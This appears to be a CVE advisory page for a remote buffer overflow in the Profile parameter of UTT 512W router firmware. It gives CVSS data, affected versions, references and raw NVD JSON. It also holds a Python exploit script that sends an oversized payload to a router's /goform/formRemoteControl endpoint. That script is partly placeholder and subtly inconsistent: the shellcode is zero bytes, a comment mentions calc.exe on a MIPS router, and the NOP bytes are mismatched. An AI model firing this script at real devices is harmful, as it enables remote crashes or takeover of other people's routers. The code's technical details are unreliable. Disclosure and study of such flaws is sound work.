CVE-2025-15428

Description

A weakness has been identified in UTT 进取 512W 1.7.7-171114. Affected is the function strcpy of the file /goform/formRemoteControl. This manipulation of the argument Profile causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 512W 固件 1.7.7-171114 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-15428 PoC - UTT 进取 512W Buffer Overflow in /goform/formRemoteControl
Vulnerable Product: UTT 进取 512W Firmware 1.7.7-171114
CVSS Score: 8.8 (High)
"""

import requests
import sys

TARGET = "http://{target_ip}"  # Replace with router IP
ENDPOINT = "/goform/formRemoteControl"

def create_exploit_payload():
    """Generate buffer overflow payload for strcpy exploitation"""
    # Buffer size estimation (adjust based on target)
    buffer_size = 1024
    # Padding to overflow buffer
    padding = b'A' * buffer_size
    # Overwrite return address with NOP sled + shellcode address
    # Using MIPS NOP instruction (0x10000000)
    nop_sled = b'\x00\x10\x00\x00' * 16
    # Placeholder for shellcode (calc.exe or telnet backdoor)
    shellcode = b'\x00' * 200
    # Target return address (needs to be adjusted)
    ret_addr = b'\x42\x42\x42\x42'
    payload = padding + ret_addr + nop_sled + shellcode
    return payload

def exploit(target_ip, username, password):
    """Execute buffer overflow exploit"""
    url = f"http://{target_ip}{ENDPOINT}"
    
    # Authentication (if required)
    auth = (username, password) if username and password else None
    
    # Create malicious Profile parameter
    payload = create_exploit_payload()
    
    # Send exploit request
    data = {
        'Profile': payload.decode('latin-1'),  # Send overflow payload
        'action': 'apply'  # Common action parameter
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload size: {len(payload)} bytes")
        
        response = requests.post(url, data=data, auth=auth, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[*] Exploit sent. Check target for RCE.")
        
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [username] [password]")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2] if len(sys.argv) > 2 else None
    pwd = sys.argv[3] if len(sys.argv) > 3 else None
    
    exploit(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15428
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15428
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15428/
[4] VulDB https://vuldb.com/cve/CVE-2025-15428
[5] https://github.com/Lena-lyy/cve/blob/main/1223/18.md
[6] https://github.com/Lena-lyy/cve/blob/main/1223/18.md#poc
[7] https://vuldb.com/?ctiid.339350
[8] https://vuldb.com/?id.339350
[9] https://vuldb.com/?submit.721875

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15428", "sourceIdentifier": "[email protected]", "published": "2026-01-02T05:15:43.710", "lastModified": "2026-01-12T20:27:35.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in UTT 进取 512W 1.7.7-171114. Affected is the function strcpy of the file /goform/formRemoteControl. This manipulation of the argument Profile causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/Lena-lyy/cve/blob/main/1223/18.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Lena-lyy/cve/blob/main/1223/18.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339350", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339350", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721875", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}